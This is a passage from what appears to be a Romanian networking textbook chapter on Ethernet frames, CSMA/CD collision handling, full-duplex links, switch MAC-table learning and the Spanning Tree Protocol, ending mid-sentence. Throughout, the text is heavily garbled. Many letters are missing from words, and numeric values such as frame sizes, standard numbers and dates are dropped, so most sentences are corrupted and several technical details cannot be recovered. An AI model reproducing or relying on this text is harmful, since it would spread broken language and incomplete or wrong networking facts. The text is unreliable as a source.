Având numeroase avantaje (uşu i ţa de i stala e şi î t eţi e e, apa itatea de a i troduce
oi teh ologii, fia ilitatea, ostul elati s ăzut , eţelele Ethernet sunt de tip shared-media
(mediu multiacces – ai ulte staţii o e tate la a elasi ediu fizi , de i o i e ad u t a s is
de ăt e o staţie a fi e epţio at de ăt e toate elelalte staţii di eţeaua lo ală.
2.1.1 Structura cadrului Ethernet

Din punctul de vedere al cadrului Ethernet, p oto olul ofe ă t ei tipu i de i fo aţii:
ide tifi a ea desti aţiei şi a su sei pe aza u ei ad ese MAC, p e iza ea p oto olului de i el
superior (de i el eţea şi o su ă de o t ol pe t u e ifi a ea i teg ităţii datelo .
Structura cadrului Ethernet este ap oape ide ti ă, i dife e t de a ia ta de Ethernet
folosită, şi o ţi e u ătoa ele â pu i:
6 6 2 46-1500 4
Adresă Adresă Sumă de
Lungime/Tip Date
destinaţie sursă control
2-1: Structura cadrului Ethernet
Antetul Ethernet este de o teţi, î pă ţiţi î t ei â pu i: o teţi pe t u ad esa

desti aţie, o teţi pe t u ad esa su să şi o teţi pentru câmpul tip, câmp ce este folosit
pentru precizarea protocolului de nivel superior.
Câmpul Lungime/Tip din antetul Ethernet este i te p etat a şi lu gi e a ad ului da ă
aloa ea sa este ai i ă de î he aze i al . Da ă este ai a e de 1536, el
ep ezi tă p oto olul de i el supe io folosit.
Câ pul de date t e uie să fie ai a e de de o teţi. Da ă di î tâ pla e datele su t
de lu gi e ai i ă, se adaugă o „u plutu ă u ită padding pentru a ajunge la
di e siu ea i i ă de de o teţi. A est â p u a e oie să depăşeas ă di e siu ea MTU
– Maximum Transmission Unit – care pentru Ethernet este de o teţi, eea e î sea ă
ă u ad u Ethernet u a e oie să fie ai i de sau ai a e de o teţi.
1
http://standards.ieee.org/regauth/oui/
62 | ‘ e ţ e l e L o a l e
Suma de control este ataşată la sfâ şitul ad ului, su fo a u ui â p de o teţi, î

s opul dete tă ii e o ilo de t a s isie. Nu ă ul e o ilo C‘C este e t e de edus î eţele
locale actuale, astfel ă ele a ţa a estui â p este s ăzută.
“u esul iito al eţelelo Ethernet pare incontestabil. Standardul Ethernet a o ti uat să
se dez olte şi este î ă î u s de dez olta e. Î eţelele lo ale p eţu ile s it hu ilo de
GigabitEthernet şi a i te feţelo de eţea se ap opie tot ai ult de p eţu ile de FastEthernet.
Metro Ethernet a de e it o teh ologie ăspâ dită î eţelele de I“P, teh ologie e îşi
propune aducerea standardului Ethernet î eţelele et opolita e MAN , u leul eţelei fii d
azat pe o st u tu ă IP/MPL“ deja e iste tă. Noi sta da de la G ps pe up u şi fi a opti ă
multi-mode au apă ut deja pe t u a ăspu de e i ţelo de a dă di eţelele et opolitane.
Pi ă i ea itezelo şi a lu gi ii a i e a u ui seg e t, Ethernet devine o tehnologie
ia ilă atât pe t u MAN ât şi pe t u WAN.
În figura de mai jos este p eze tată o e oluţie su a ă a sta da delo Ethernet. În iulie
2003 s-a sta da dizat . ae, e ofe ă iteze de pâ ă la Gp s doa pe t u eţele de fi ă
opti ă. Ulti a sta da diza e a Ethernet-ului IEEE . a a fost ap o ată pe iulie şi a
fost pu li ată pe septe ie , ofe i d iteze de pâ ă la Gp s pe a lu to sadat
UTP . Deşi e istă e hipa e te de eţea sp e â za e, sta da dul pe t u G ps este aşteptat
în 2009.
Ethernet Concurenţa
1983 802.3 – 1 Mbps
802.5 – 4 Mbps
802.3 – 10 Mbps
802.5 – 16 Mbps
1995 ATM – 155 Mbps
802.3u – 100 Mbps
1996 ATM – 622 Mbps
1998 802.3z – 1000 Mbps
2003 802.3ae – 10 Gbps
2-2: E oluția sta dardelor Ethernet
2.1.2 CSMA/CD
Proble a i iţială de la a e au po it eţelele Ethernet e a găsi ea u ei etode de
a it a e a a esului la ediul de o u i aţie o u . A eastă difi ultate a fost p i a oa ă
e plo ată î a ii ` , la o u i e sitate di Ha aii, î t -u p oie t e îşi p opu ea să ofe e a es
ai ulto utilizato i la o eţea fă ă a se alele lo să se a este e. ‘ezultatul p oie tului a
fost eţeaua Aloha et, a e a de e it ai tâ ziu aza pe t u C“MA/CD Carier Sense Multiple
Access / Colison Detection), metoda de acces la mediu folosită î eţelele Ethernet.
‘eţelele Ethernet sunt de tip shared-media, de i o i e ad u t a s is de ăt e o staţie a fi
e epţio at de ăt e toate elelalte staţii di eţeaua lo ală. Toate al ulatoa ele, la
e epţio a ea u ui ad u alid, o e ifi a da ă ad esa MAC î s isă î ad ul â pului
desti aţie di a tetul ad ului p i it este ide ti ă u ad esa MAC p op ie. Da ă u se
sta ileşte ă ele două ad ese su t ide ti e, ad ul este ig o at şi u a fi t a s is ăt e
i elul eţea.
P eze ţa ad esei su să î ad u se e pli ă p i faptul ă o i e o u i aţie este
idi e ţio ală, î se sul ă o i e ad u t a s is a e de o i ei a u a e e ite ea u ui ad u
de ăspu s.
P oto olul C“MA/CD este el pe aza ă uia fu ţio ează Ethernet. Deoarece Ethernet se
azează pe u ediu de tip pa tajat shared-media , u ai o si gu ă staţie poate t a s ite la
un moment dat.
Se primesc date
pentru transmisie
Mediu N
liber? u
D
a
Asa lează ad ul
Începe transmisia
A apă ut o D Transmite semnal de

coliziune? a bruiaj
N
u
Transmite cadrul î e ă i= î e ă i+ Aşteaptă
u ăto microsecunde
Cal ulează
Mai sunt D î e ă i< Dalgoritmul de
cadre? a a _î e ă i? a backoff
N N
u u
Transmisie A a do ează
î heiată transmisia
2-3: Tratarea coliziunilor
Câ d o staţie do eşte să t a s ită, ea u ează u ăto ul p o edeu: „as ultă pe fi să

adă da ă u u a ai t a s ite i e a î a el ti p. Da ă „aude ă ai t a s ite i e a,
staţia aşteaptă o pe ioadă de ti p aleatoa e după a e î ea ă di ou adi ă as ultă di
ou . Da ă u t a s ite i e i, staţia î epe să t a s ită, î să î a elaşi ti p o ti uă şi să
64 | ‘ e ţ e l e L o a l e
as ulte, pe t u a fi sigu ă ă u a ai î eput i e i să t a s ită. După e t a s isia se

te i ă, staţia se î toa e la sta ea i iţială î a e as ultă.
“e poate î să a două staţii, urmând acest pro edeu, să o state ă u ai t a s ite
i e i, şi o side â d ediul li e , să î eapă t a s isia si ulta , o e t î a e ad ele
de la două staţii dife ite su t pe a elaşi ediu, eea e dete i ă o oliziu e.
O oliziu e a e lo atu i â d doi iţi de la două staţii dife ite a e t a s it se află pe
a elaşi ediu de t a s isie î a elaşi ti p.
În cazul transmisiunilor analogice pe up u a lu oa ial , te siu ile elo două se ale
i a e se adu ă, ge e â d astfel u al t eilea i el de te siu e. A eastă a iaţie a te siu ii
este i te p etată d ept o oliziu e.
Î azul t a s isiu ilo digitale a lu to sadat sau fi ă opti ă , ediul de t a s isie este
full-duplex, ia oliziu ile apa la i elul e iţăto ului, a e epto ului sau a dispoziti elo de
i te o e ta e sp e e e plu u hu a pe ite apa iţia de oliziu i . Coliziu ile apă ute pe o
pla ă de eţea sau pe u s it h half-duplex su t oliziu i logi e. Astfel da ă o staţie î epe să
t i ită u ad u, da î ai te de a fi aliza t a s isia î epe să e epţio eze t afi , se a
i te p eta situaţia a şi o oliziu e, a î t e upe t a s isia şi a i iţia algo it ul de backoff.
Câ d staţiile „aud oliziu ea, o ti uă să t a s ită î ă o pe ioada foa te s u tă de ti p
(semnalul de jam) pentru a fi sigu e ă toate staţiile di eţea au sesizat-o. După e a eastă
oliziu e a fost e a ată de toate staţiile di eţea ai e a t, di do e iul de oliziu e ,
este apelat un algoritm de backoff şi t a s isia î etează. Toate staţiile se op es di t a s is
pe t u o pe ioadă aleatoa e de ti p, după a e eî ea ă să t a s ită.
2.1.3 Full-duplex Ethernet

E istă două odu i de t a s isie u ite şi duple : half-duplex şi full-duplex. În modul de
transmisie half-duplex o staţie u poate t i ite şi p i i î a elaşi timp: ori transmite, ori
p i eşte.
De e e plu, a lul oa ial este p i defi iţie u ediu pe t u half-duplex, pe t u ă
t a s isia şi e epţia se ealizează pe a elaşi fi . Pe a lu ile to sadate î să, p i folosi ea u ei
perechi separate pentru transmisie u ită T şi u ei alte pe e hi pe t u e epţie u ită
‘ se poate asigu a supo t de o u i aţie full-duplex.
Pe t u a o o u i aţie să fie full-duple t e uie a atât ediul de t a s isie, ât şi
pa ti ipa ţii la o e saţie să ofe e supo t full-duplex.
Ca lul to sadat ep ezi tă u ediu de o u aţie full-duplex, da da ă se foloseşte u
hu , sau o pla ă de eţea o figu ată half-duplex, o u i aţia se a ealiza half-duplex.
“ it hu ile şi plă ile de eţea a tuale ofe ă supo t atât pe t u o u i aţie full-duplex, cât
şi pe t u o u i aţia half-duple . Modul de fu ţio a e poate fi o figu at a ual di
d i e ul plă ii de eţea, sau i te faţa s it hului , sau auto at, î u a ego ie ii. Da ă
auto ego ie ea u euşeşte şi u su t fă ute setă i a uale, transmisia se va face pe half-
duplex.
Atunci când folosim full-duplex u se ai foloseşte modul de acces la mediu CSMA/CD
pe t u ă aceasta nu mai este o eţea de tip ediu pa tajat. Mai e a t, da ă este posi ilă
t a s ite ea şi p i i ea de date î a elaşi ti p, nu mai pot avea loc coliziuni. Astfel, în cadrul
unei transmisii full-duplex, u se ai ealizează dete ţia de oliziu i.
Li ită ile de dista ţă di sta da dele Ethernet sunt specificate pentru modul de acces la
ediu C“MA/CD, şi u ai su t alabile pentru full-duplex. A este li ită i, el ai adesea,
su t al ulate astfel î ât să pe ită tutu o staţiilo o e tate să sesizeze apa iţia u ei
coliziu i. Î o diţiile full-duplex, si gu a li ita e a dista ţei este ea teh ologi ă. U e e plu
este FastEthernet pe fi a opti ă single-mode, a ă ui dista ţă este li itată de sta da dul IEEE
. la , î o diţii de a es C“MA/CD, î să pentru o legătu ă pu t-la-punct full-
duplex, se pot folosi transceiver-uri puternice o ţi â d o legătu ă de pâ ă la k .
“ta da dul Giga it u ai p e ede u od de o u i aţie half-duplex ci doar full-
duplex, oti pe t u a e toţi pa a et ii legaţi de apa iţia oliziu ilo u ă de î e ă i,
timp de backoff, et su t espe ifi aţi.
2.2 Ethernet switching

În continuare o fi a alizate eţelele Ethernet şi switching-ul cadrelor la nivel doi.
Switching-ul de i el doi p esupu e folosi ea ad eselo fizi e a staţiilo di t -un LAN în
ede ea seg e tă ii eţelei. După u se ştie, Ethernet se azează pe u ediu de tip partajat
(shared-media , de i u ai o si gu ă staţie poate t a s ite la u o e t dat. “e poate a
două staţii să î eapă t a s isia si ulta , o e t î a e ad ele de la ele două staţii
dife ite se află pe a elaşi ediu, eea e dete i ă o oliziu e. ‘eţelele Ethernet a fu ţio a
foa te i e î o diţii ideale. Da ă u ă ul utilizato ilo î eţea de i e î să foa te a e,
atu i u ă ul oliziu ilo a eşte se ifi ati , du â d la o s ăde e a pe fo a ţelo
eţelei. Astfel, e oia de a spa ge do e iile a i de oliziu e î do e ii ai i i a fost itală.
Do e iile de oliziu e şi ele de difuza e au î eput să fie t eptat p oie tate u s opul de a
li ita efe tul egati al oliziu ilo şi al difuză ilo asup a pe fo a ţelo eţelei.
Un domeniu de coliziune ep ezi tă a ea se ţiu e di t -o eţea î a e se a p opaga o
oliziu e. “ it hu ile şi routerele li itează do e iile de oliziu e, da epetoa ele le e ti d.
Un domeniu de difuzare do e iu de oad ast ep ezi tă a ea se ţiu e di t -o reţea î
care se va propaga un pachet de difuzare (broadcast). Routerele li itează do e iile de
difuza e, da epetoa ele şi s i hu ile le e ti d.
U seg e t de reţea este e hi ale t u u do e iu de oliziu e, după u u ei eţele îi
corespunde un domeniu de difuzare.
Ca e su t e a is ele de de izie ale u ei s it h? Cele două e a is e e fa di s it h
u dispoziti de i te o e ta e „i telige t su t: î apsula ea datelo la i el legătu ă de date
şi folosi ea u ei s he e de ad esa e pe t u li a ea a estora. Toate deciziile luate de un
switch sunt bazate pe adresa fizica (MAC), neafectâ d ad esa logi ă ad esa de i el t ei a
pachetului.
G upa ea datelo u se fa e la i el de it i la i el de ad u, u ad u putâ d o ţi e
pâ ă la de o teţi î azul cadrului Ethernet, 2300 pentru WLAN, sau hia de o teţi
în cazul Token Ring.
Î p eze t, o eţea lo ală este fo ată di s it hu i, AP-u i şi routere.
Defi iţia ea ai ăspâ dită a s it hu ilo ide tifi ă o i e bridge multiport cu un switch.
Î ealitate, deşi a eastă defi iţie a ope ă asta ajo itate a azu ilo , e istă bridge-uri
multiport ce nu sunt switchuri.
În timp ce switchul este defi ită a u dispoziti de i te o e ta e de i el legătu ă de
date, defi iţia s it hului i lude atât fu ţii de i el fizi , ât şi de i el legătu ă de date.
A easta dife e ţă u se dato ează u ei late ţe ai i i sau u ui ost ai s ăzut o pa ati
u o pu te, i faptului ă î eţelele Ethernet e foloses ediul to sadat s it hul p eia fu ţia
principală a hu ului, şi a u e a eea de a asigu a o e ta ea tutu o odu ilo la u ediu de
transmisie.
66 | ‘ e ţ e l e L o a l e
Pe i te feţele u ui s it h se pot o e ta staţii sau segmente întregi. Cu toate acestea,

eţelele switched su t ăspu sul la e i ţele es â de de se u itate şi de lăţi e de a dă
pe t u fie a e od. ‘eţelele o utate o folosi âte u po t pe t u fie a e staţie, edu â d
di e siu ea do e iilo de oliziu e la doa două odu i u ul fii d pla a de eţea di
espe ti a staţie, ia el de-al doilea portul din swit h a e o o e tează pe a easta .
P i ipalele fu ţii ale u ui s it h su t: î ățarea adreselor (popularea tabelei MAC) şi
modul de comutare a cadrelor. Pe lâ gă a estea, e istă o se ie de fu ţii pe a e u ele
switchuri le pot oferi: eliminarea buclelo de i el doi, sepa a ea eţelelo lo ale i tuale, et .
2.2.1 Învăţarea adreselor

“ it hu ile de i el doi eţi ad esa fizi ă su să a ad ului p i it pe o i te faţă şi
i t odu a eastă i fo aţie î t -o ta elă - ta elă de o utare - u ită şi ta elă MAC
(bridging/switching table . Î a eastă ta elă fie a ei ad ese fizi e îi este aso iată u a di t e
i te feţele sale. Î figu a de ai jos este e e plifi ată o astfel de ta elă.
I terfață Adresă MAC

E0 00.48.C2.01.78.12
E0 00.00.2E.00.59.91
E1 00.00.54.91.01.4A
2-4: Ta elă de o utare u i trări
De e e plu, p i a i t a e a e u ătoa ea se ifi aţie: desti aţia . .C . . . se

află pe seg e tul o e tat pe i te faţa E a s it hului E este p es u ta ea de la Ethernet 0,
p i a i te faţă Ethernet).
Cu îşi o st uieşte s it hul ta ela de o uta e?
Ta ela de o uta e este păst ată î e o ia ‘AM a s it hului şi p i u a e se pie de
da ă s it hul este ei iţializat. Î plus, u s it h t e uie să i ludă di a i î ta ela de
o uta e i fo aţii desp e o ouă staţie o e tată î eţea.
“e o side ă eţeaua di figu a de ai jos, u de s it hul a fost ei iţializat, şi staţia A
ea să o u i e u staţia B .
2-5: Construirea ta elei de o utare pe tru o rețea u s it huri
“taţia A as ultă ediul, ia â d a esta este li e t i ite u ad u e a e a desti aţie

staţia B . “taţiile A şi A ig o ă ad ul. “ it hul p i eşte ad ul şi î ea ă să găseas ă
ad esa desti aţie î ta ela sa de o uta e. “ it hul u euşeşte să găseas ă desti aţia,
deoa e e ta ela sa de o uta e este goală, astfel î ât el t a s ite ad ul pe toate

seg e tele la a e este o e tat, î afa ă de seg e tul de pe a e a fost p i it ad ul
(flooding). În a eastă etapă, fu ţio a ea s it hului este si ila ă u ea a u ui hu . Î ai te de
a et a s ite ad ul s it hul e ifi ă da ă ad esa su să este p eze tă î ta ela sa de
o uta e. Î a est az u este, astfel î ât s it hul eează p i a i t a e î ta ela de
o uta e, i t a e e o ţi e ad esa fizi ă a staţiei A şi i te faţa s it hului e o e tează
seg e tul A. Cad ul aju ge atât pe seg e tul D u de staţiile D şi D de id ă a esta u le
este ad esat şi îl ig o ă ât şi pe seg e tul B, la staţiile B şi B şi la s it hul .
“ it hul de ide ă desti aţia se află î seg e tul di a e a p i it ad ul şi de i u îl
ai et a s ite, ia staţia B de ide ă ea este desti ata ul ad ului.
U ătoa ele i t ă i î ta ela de o uta e su t adăugate î od si ilar, pe baza
i fo aţiilo o ţi ute î â pul su să a ad elo e aju g la s it h.
Chia şi o u i aţia î t e două staţii aflate î a elaşi seg e t poate afe ta lăţi ea de
a dă di î t eaga eţea, da ă s it hul u a apu at să-şi o st uias ă ta ela de o utare.
“e o side ă ă staţia A t i ite u ad u ăt e A , după el t i is ăt e B . Cad ul aju ge
la desti aţie fă ă ajuto ul s it hului, da s it hul, eide tifi â d desti aţia î ta ela sa de
o uta e, a et a s ite ad ul atât pe seg e tul B, ât şi pe segmentul D.
Dato ită difi ultăţii ăută ii î t -o ulţi e eo do ată, î ta ela de o uta e u su t
păst ate toate ad esele staţiilo di eţeaua lo ală, i doa ale elo u o p o a ilitate a e să
t a s ită î iito ul ap opiat - mai exact a ultimelo staţii a e au t a s is. Pe t u
implementarea acestui concept, o intrare într-o ta elă de o uta e a i lude şi o eti hetă de
ti p, pe lâ gă ad esa MAC şi i te faţă. Eti heta de ti p este a tualizată â d se p i eşte u
ou ad u u a eeaşi ad esă su să. A est e a is pe ite î lătu a ea i t ă ilo î e hite şi
du e de i la est â ge ea di e siu ii ta elei de o uta e. P eţul plătit, î azul î a e o
staţie u t a s ite niciun ad u u i te al de ti p, este o su ul di lăţi ea de a dă a
tuturor seg e telo di eţea.
E istă o si gu ă e epţie ota ilă la p o esul des is ai sus: î azul î a e ad esa
desti aţie a ad ului este a eeaşi u ad esa su să, ad ul este o side at i alid, a fi a u at,
î plus ad esa su să u a fi folosită pe t u popularea tabelei de comutare.
2.2.2 Deciziile de comutare

Ca e este olul s it hului î o u i aţia di i te io ul a eluiaşi seg e t?
Protocolul Ethernet ofe ă u ediu de o u i aţie pa tajat, ai e a t o u i aţia di t e
două staţii este a esi ilă i elului legătu ă de date a o i ă ei alte staţii o e tate pe a elaşi
seg e t. Pe t u fie a e ad u p i it de o staţie, i elul legătu ă de date e ifi ă da ă a eastă
staţie este sau u desti aţia. Î azul afi ati ad ul este pasat i elului eţea, alt i te i este
ignorat.
‘eţeaua di figu a de ai jos ilust ează azul o u i aţiei î i te io ul a eluiaşi seg e t.
De e e plu, staţia A ea să t a s ită date staţiei A .
Deoa e e este o a desp e o eţea Ethernet, primul lucru pe care-l fa e staţia A este
asculta ea ediului. Da ă ediul este li e î epe t a s isia datelo . Cad ul e is de A se
p opagă ăt e toate staţiile o e tate pe a est seg e t, i lusi ăt e s it h. “taţia A t e e
ad ul ăt e i elul eţea, staţia A îl ig o ă. Odată aju s la s it h, ad ul este despa hetat şi
ad esa desti aţie este ăutată î ta ela de o uta e a s it hului. “ it hul de ide ă
desti aţia se află hia pe i te faţa pe a e a p i it ad ul. Î a est az s it hul ia de izia ă
acest cadru nu mai trebuie transmis (filtering), deoarece retransmiterea cadrului ar duce la o
dupli a e a a estuia la desti aţie.
68 | ‘ e ţ e l e L o a l e
2-6: Rețea seg e tată u s it huri
Cu a ţio ează s it hul î azul o u i aţiei î t e B şi B ? A ele s it hu i deşi

e epţio ează ad ele iau de izia de a u le ai et a s ite.
Da ă a ele o u i aţii apa si ulta atât A t a s ite ăt e A , ât şi B ăt e B , a
apă ea oa e o oliziu e? Cu sigu a ţă ă da, da ă î lo de s it hul a fi fost folosit u
repeto . Î azul utiliză ii u ui s it h, de e e e niciun ad u di o u i aţia di t e A şi A
u aju ge pe seg e tul B, şi niciun ad u di o u i aţia di t e B şi B u aju ge pe
seg e tul A, este i posi il să apa ă o oliziu e.
“ it hul izolează o u i aţia u i ast î t e staţii aflate î a elaşi seg e t la i elul
segmentului.
Co se i ţele a estui fapt su t e t e de i po ta te. Î p i ul â d, s it hul ă gi eşte
do e iile de oliziu e. Totodată, el ofe ă ai ultă a dă dispo i ilă, deoa e e o u i aţia
î i te io ul a eluiaşi seg e t u o su ă di a da dispo i ilă a î t egii eţele.
O altă o se i ţă o ep ezi tă i i iza ea is u ilo de se u itate legate de ata u ile di
i te io ul eţelei lo ale. De e e plu, u ul di t e ele ai popula e ata u i este ascultarea
liniei (sniffing attack , p i a e se fo ţează i elul legătu ă de date de pe u a di t e staţiile
o e tate la ediul dist i uit să t i ită sp e i elu ile supe ioa e toate ad ele - inclusiv cele
e u su t desti ate a estei staţii. Cu ajuto ul u o apli aţii dedi ate datele su t easa late
şi astfel poate fi o ito izat tot t afi ul e t a e sează seg e tul de eţea. Da , p i folosi ea
s it hu ilo , este posi il a staţiile e p ezi tă u is de se u itate să fie izolate de estul
eţelei.
Ca e este olul s it hului î o u i aţia di t e seg e te?
Da ă î eţeaua di figu a p e ede tă este i iţiat u t afi î t e staţia A şi B , staţia A
î epe p i a as ulta ediul şi t a s ite u ad u atu i â d a esta este li e . Cad ul se
p opagă sp e staţiile A , A şi sp e s it hul . “taţiile ig o ă ad ul, a esta efii d ad esat lo .
“ it hul ăută î să ad esa desti aţie î ta ela sa de o uta e. “ it hul dete i ă i te faţa
pe a e t e uie t i is ad ul şi apoi de ide ă a eastă i te faţă este dife ită de ea pe a e
cadrul a fost primit. Astfel, switchul transmite cadrul primit din segmentul A doar pe
segmentul B (forwarding . “ it hul este e epţio at atât de B , ât şi de B , da doa B îl a
prelucra.
2.2.3 Evitarea buclelor de nivel doi – STP

U a di t e p i ipalele li ită i ale i elului legătu ă de date se efe ă la posi ilitatea
asigu ă ii edu da ţei. Astfel, pe t u î eput a fi a alizat i pa tul edu da ţei asup a
eţelelo fo ate u ai di s it hu i.
O u lă de i el legătură de date apare într-o eţea atu i â d î t e două dispoziti e ale

a esteia e istă două sau ai ulte legătu i a ti e, fie a e o e iu e folosi d doa dispoziti e
de i te o e ta e e pot a aliza el ult i fo aţii de i el legătu ă de date.
2-7: Rețea î are s-a reat o u lă
Ca e este efe tul apa iţiei u lelo de i el legătu ă de date?

Apa iţia u lelo de i el legătu ă de date este o elată u faptul ă s it hu ile u
filt ează pa hetele de difuza e şi du la o dep e ie e se ifi ati ă a pe fo a ţelo eţelei
prin determinarea unei a ala şe de difuzări (broadcast storm).
“e o side ă eţeaua di figu a de ai sus. Se presupune ă staţia A t i ite u ad u de
difuza e. “ it hul u a găsi ad esa desti aţie î tabela sa de comutare, astfel încât va
t a s ite ad ul pe elelalte seg e te: seg e tul e o ţi e staţia B, seg e tul di t e
s it hu ile şi p e u şi seg e tul di t e s it hu ile şi . “taţia B e a i ează ad ul,
de ide ă îi este ad esat şi îl t e e sp e i elul legătu ă de date. “ it hul ia de izia de a
t a s ite ad ul pe toate i te feţele sale, u e epţia elei de pe a e a p i it ad ul. Astfel
apa î eţea două ad e desti ate staţiei FF.FF.FF.FF.FF.FF, adi ă două ad e de difuza e.
Indife e t de o di ea î a e a estea aju g la s it hul , a esta a de ide ă u u oaşte
ad esa desti aţie şi le a et a s ite ăt e staţia C, da şi ăt e elelalte s it hu i.
A ala şa de difuză i o su ă di a da utilă a eţelei, du â d la o i şo a e a bandei
efe ti e dispo i ile. O a ala şă de difuză i se op eşte doa î azul î t e upe ii u lei.
Cu poate fi p e e ită apa iţia a ala şelo de difuză i?
“oluţia t i ială este a s it hu ile să fie i st uite să u et a s ită ad ele de difuza e. Di
pă ate acest lucru este imposibil, deoarece o serie de protocoale folosesc cadre de difuzare
pe t u a fu ţio a o e t, u ul di t e a estea fii d hia A‘P - Address Resolution Protocol.
Altfel spus, filt a ea ad elo de difuza e de ăt e s it hu i a p esupune rescrierea
p oto oalelo fu da e tale e asigu ă supo tul de o u i aţie.
“oluţia alidă se azează pe ide tifi a ea u lelo şi î t e upe ea lo . P oto olul e
ealizează a easta se u eşte “TP - Spanning Tree Protocol, şi po eşte de la o st ui ea unui
arbore de acoperire pe g aful dete i at de dispoziti ele de i te o e ta e şi de o e iu ile
dintre acestea.
“u t p o le ele de edu da ţă legate e lusi de ad ele de difuza e?
Cad ele de difuza e su t p i ipala auză a defo ă ii pe fo a ţelo u ei eţele u u le
de i el legătu ă de date. Cu toate a estea, edu da ţa poate du e la î ăţa ea de i fo aţii
false hia î a se ţa ad elo de difuza e.
Pe t u a edea o po ta e tul u ei eţele edu da te î azul ei iţializă ii u uia di t e
switchuri, se va o side a eţeaua di Figu a - . Astfel staţia A, i te faţa e di s it hul
(care va fi notat î o ti ua e “ şi i te faţa e di s it hul “ fa pa te di a elaşi
do e iu de oliziu e. Î od ase ă ăto staţia B, i te faţa e di “ şi i te faţa e di “
pa tajează a elaşi ediu de o u i aţie.
70 | ‘ e ţ e l e L o a l e
2-8: Rețea de s it huri u o u lă
“ a fost ei iţializat, astfel î ât â d staţia A a t i ite u ad u desti at staţiei B, “ u

a găsi icio i fo aţie î ta ela sa de o uta e desp e B. Î a est az a i t odu e î ta ela
sa de o uta e o espo de ţa î t e i te faţa sa e şi ad esa MAC a staţiei A. Î pa alel u
actualizarea tabelei de comutare S1 va trimite cadrul pe toate celelalte interfeţe î afa ă de
e , i lusi pe i te faţa e . Astfel, ad ul a aju ge atât la desti aţie, ât şi pe i te faţa e di
“ . “ , ştii d ă desti aţia staţia B se află pe a elaşi seg e t u i te faţa e a ig o a ad ul.
Mediu de o u i aţie fii d pa tajat ad ul t a s is de A a aju ge atât la “ , ât şi la “ .
Cad ul p i it pe i te faţa e a fi p o esat de “ şi t i is pe i te faţa e . Astfel ad ul a
aju ge î ă odată la desti aţie, staţia B p i i d două opii ale a eluiaşi ad u. Î plus ad ul a
ajunge şi la s it hul , a e după e îşi a i spe ta ta ela de o uta e, a găsi o espo de ţa
î t e ad esa MAC a staţiei A şi e . Cad ul se at u ad esa MAC a staţiei A fii d p i it pe
i te faţă e , s it hul o side ă ă i fo aţiile di ta ela de o uta e su t alte ate şi a
i alida a eastă i t a e, eâ d apoi o ouă i t a e e a o ţi e o espo de ţa î t e ad esa
MAC a staţiei A şi i te faţa e . Î plus, ad ul a fi t i is pe toate i te feţele î afa ă de e ,
inclusiv pe e1.
S-a aju s astfel î situaţia în care cadrul de unicast t i is de staţia A a fi li at la
desti aţie de u u ă eli itat de o i, î plus ta ela s it hului şte gâ d şi adăugâ d
alte ati o espo de ţele î t e ad esa MAC a staţiei A şi i te feţele e pe de o pa te şi
corespondenţa u e pe de altă pa te.
Pâ ă î a est pu t s-a a gu e tat faptul ă edu da ţa la i elul legătu ă de date
i pli ă asu a ea u o is u i i po ta te. “oluţia pe t u asigu a ea edu da ţei eţelei lo ale
o stă î păst a ea edu da ţei de i el fizi , da î t e upe ea u lelo de i el legătu ă de
date, a eastă soluţie fii d i ple e tată de “TP Spanning Tree Protocol).
Cu fu ţio ează “TP?
Fu ţio a ea a estui p oto ol se azează pe ea ea topologiei eţelei folosi d işte ad e
speciale, numite cadre BPDU (Bridge Protocol Data Unit). Aceste cadre speciale sunt folosite
i te s la i iţializa ea s it hu ilo ; ulte io , la fie a e două se u de su t s hi ate ad e
BDPU, pe t u a e ifi a da ă u au apă ut odifi ă i. Totodată su t defi ite i i stă i î are
se poate afla o i te faţă a s it hului: sta ea lo at, de as ultare, de î ățare, de o utare de
adre şi efu țio al (blocking, listening, learning, forwarding, disabled). În starea blocat nu
se a eptă de ât ad e BPDU, î ea de as ulta e se p i es şi ad e, da a estea u su t
et a s ise. Î sta ea de î ăţa e, î plus faţă de sta ea de as ulta e, este i spe tată ad esa
su să a ad elo p i ite, pe iţâ d astfel o st ui ea ta elei de o uta e. Î sta ea de
comutare, cadrele primite sunt retransmise, ia ta ela de o uta e este a tualizată. Î sta ea
efu ţio al u su t a eptate i i ad e BPDU.
Pentru construirea arborelui de acoperire sunt necesare aproximativ 50 de secunde, timp
în care toate porturile switchurilor sunt în starea blocat. Există t ei paşi e t e uie u aţi
pe t u o st ui ea a o elui de a ope i e: ai î tâi t e uie aleasă rădă i a ar orelui (root
bridge), apoi trebuie alese porturile rădă i ă, pe t u a î fi al să fie sta ilite porturile active.
Prioritatea switchului este o aloa e u e i ă păst ată î e o ia e olatilă a fie ă ui

s it h. Pe aza o pa ă ii p io ităţilo tutu o s it hu ilo di eţea, este ide tifi at s it hul
u p io itatea ea ai s ăzută, a easta de e i d ădă i a a o elui de a ope i e.
Prioritatea swit hului a e o aloa e i pli ită at i uită de p odu ăto , aloa e e poate fi
odifi ată ulte io . Î azul folosi ii ai ulto e hipa e te p oduse de a eeaşi fi ă, se
î tâ plă adesea să e iste ai ulte s it hu i u a eeaşi p io itate. Cu poate fi sta ilit care
di t e două sau ai ulte s it hu i u a eeaşi p io itate să de i ă ădă i a a o elui? Pe
aza ad esei fizi e: s it hul u ea ai i ă ad esă fizi ă de i e ădă i a a o elui de
acoperire.
Pasul al doilea p esupu e ide tifi a ea ăilo edu da te di t e fie a e s it h şi s it hul
ădă i ă, apoi sele ta ea u ei sigu e ăi î t e espe ti ul s it h şi ădă i ă şi, î fi al,
deza ti a ea elo lalte. Pe t u a easta t e uie de is ă eia di t e ele t ei atego ii de po tu i:
po t ădă i ă ‘P , po t a tiv (DP – designated ports) sau port inactiv (nondesignated ports –
NP îi a apa ţi e fie a e di t e po tu ile e pa ti ipă la “TP.
Pe t u e alua ea u ei ăi este al ulat ostul ăii, ost e este defi it a su ă a ostu ilo
porturilor prin care trece calea. Costul u ui po t este defi it la â dul său î fu ţie de lăţi ea
de a dă pe a e o ofe ă po tul.
Lăți e de a dă Cost
4 Mbps 250
10 Mbps 100
16 Mbps 62
45 Mbps 39
100 Mbps 19
155 Mbps 14
622 Mbps 6
1 Gbps 4
10 Gbps 2
2-9: Costul “TP î fu ție de lăți ea de a dă
De-a lu gul ti pului au e istat ai ulte etode de al ul a ostului u ui po t. Cu âţi a

a i î u ă ostul po tului pe t u s it hu ile CI“CO e a dete i at î pă ţi d la lăţi ea
de a dă pe a e o ofe ea po tul, astfel î ât u po t Ethernet avea costul 100.
Pe t u alege ea po tu ilo ădă i ă au p io itate po tu ile o e tate di e t la ădă i a
a o elui de a ope i e. Î azul î a e u e istă niciun port cu o cone iu e di e tă sp e
s it hul ădă i ă, sau â d e istă ai ult de u si gu po t u o e iu e di e tă sp e
